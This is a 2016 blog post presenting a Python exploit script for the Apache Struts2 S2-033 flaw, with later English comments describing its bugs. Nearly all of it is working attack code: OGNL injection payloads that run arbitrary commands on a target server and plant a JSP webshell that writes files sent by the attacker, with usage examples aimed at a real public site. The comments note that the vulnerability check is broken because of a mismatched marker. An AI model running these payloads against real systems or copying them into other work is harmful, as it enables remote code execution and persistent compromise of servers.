
Struts2 S2-033 Exploit

June 7, 2016 • Security

struts2 S2-033 Exploit By luren@ArriSec 2016.6.7

根据乌云POC写的,有待各位验证

python27中不自带requests包,地址:http://pypi.python.org/pypi/requests#downloads

import urllib,urllib2,getopt,sys,requests
import re

def info():
    """Print the command-line usage of this script to stdout.

    Lists the three supported options (-u, -c, -s) followed by three example
    invocations.  The ``[url=...]...[/url]`` fragments are reproduced exactly
    as they appear in the original listing; they look like forum markup that
    leaked into the text rather than something the script interprets.
    """
    # Parenthesised single-argument print is valid on both Python 2 and 3.
    usage_lines = (
        '-u Exploit Url',
        '-c Command',
        '-s getshell',
        'EX:python Structs2_S-033.py -u [url=http://www.baidu.com]www.baidu.com[/url]',
        'EX:python Structs2_S-033.py -u [url=http://www.baidu.com]www.baidu.com[/url] -s shell',
        'EX:python Structs2_S-033.py -u [url=http://www.baidu.com]www.baidu.com[/url] -c "whoami"',
    )
    for line in usage_lines:
        print(line)
def Test(url):
    """Probe ``url`` for S2-033 and return 1 if it looks vulnerable, else 0.

    ``Payload`` (a URL-encoded OGNL expression plus query parameters) is sent
    as the POST body through ``Exploit_Post`` and the response text is searched
    for a marker.  ``Exploit_Post`` returns ``str(e)`` on any error, so the
    marker search also runs over plain error text; the printed verdict and the
    return value always agree.
    """

    Payload ='/%23_memberAccess%[url=mailto:3d@ognl.OgnlContext]3d@ognl.OgnlContext[/url]@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908'
    Result = Exploit_Post(url,Payload)
    # str.find returns an index, so this condition only holds when the marker
    # sits at offset 1 of the response.  NOTE(review): the marker sent
    # (content=2908) and the one searched for ('2980') also differ, so as
    # written this check reports "not exist" for nearly any response.
    if Result.find('2980') == 1:
        print 's2-033 Vulnerabilities exist'
        return 1
    else:
        print 's2-033 Vulnerabilities not exist'
        return 0
def CommandExec(url,Command):
    """Send the command-execution payload to ``url`` and return the raw reply.

    ``Command`` is appended verbatim to the end of ``Payload`` (as the value of
    the trailing ``command=`` parameter) without any URL-encoding, so commands
    containing ``&``, ``#`` or spaces are sent as-is.  The return value is
    whatever ``Exploit_Post`` produced: the control-character-stripped response
    body, or ``str(e)`` if the request failed.
    """

    Payload ='/%23_memberAccess%[url=mailto:3d@ognl.OgnlContext]3d@ognl.OgnlContext[/url]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[url=mailto:3d@org.apache.commons.io.IOUtils]3d@org.apache.commons.io.IOUtils[/url]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command='
    Payload+=Command
    Result = Exploit_Post(url,Payload)
    return Result

def GetShell(url):
    """Send the file-writing payload to ``url`` and return the raw reply.

    ``Onetalkshell`` holds the JSP source that becomes the value of the trailing
    ``content=`` parameter; it is appended to ``Payload`` verbatim, without
    URL-encoding.  No success check is performed here: the caller receives the
    response text (or the ``str(e)`` error string) from ``Exploit_Post``
    unchanged.
    """

    Payload ='/%23_memberAccess%[url=mailto:3d@ognl.OgnlContext]3d@ognl.OgnlContext[/url]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),%23parameters.command[0].toString.json?&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=luren.jsp&content='
    Onetalkshell='<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>'
    Payload+=Onetalkshell
    Result = Exploit_Post(url,Payload)
    return Result

def Exploit_Post(url, Data):
    """POST ``Data`` to ``http://<url>`` and return the cleaned response body.

    The scheme ``http://`` is always prepended, so ``url`` must be given
    without one.  Any exception raised while opening the URL (connection
    failure, HTTP error status, the 10-second timeout) is caught and its
    ``str()`` is returned in place of a body, so callers cannot tell an error
    message from real response text.  The response object is not explicitly
    closed.
    """
    target = 'http://' + url
    try:
        response = urllib2.urlopen(target, Data, timeout=10)
    except Exception as err:
        return str(err)
    body = response.read()
    # Strip C0 control characters except tab, LF and CR before returning.
    control_chars = re.compile('[\\x00-\\x08\\x0b-\\x0c\\x0e-\\x1f]')
    return control_chars.sub('', body)
 
if __name__ == '__main__' :
    # Command-line entry point.  Options are handled in the order given on the
    # command line: '-u' binds `url` and runs Test(); '-c' and '-s' reuse that
    # `url`.  getopt is told every option takes a value ("u:c:s:"), so the
    # value passed to '-s' is accepted but never used.
    try:
        opts, args = getopt.getopt(sys.argv[1:],"u:c:s:")
    except:
        # Any getopt error (unknown flag, missing value) prints usage and exits.
        info()
        sys.exit(2)
    for opt, value in opts:
        if opt == '-u':
            url = value
            # Test() returning 0 aborts before any later option is processed.
            if Test(url)== 0:
                sys.exit(2)
        elif opt == '-c':
            # NOTE: `url` is only assigned by '-u'; if '-c' or '-s' appears
            # before '-u' on the command line this raises NameError.
            print CommandExec(url,value)
 
        elif opt == '-s':
            print GetShell(url)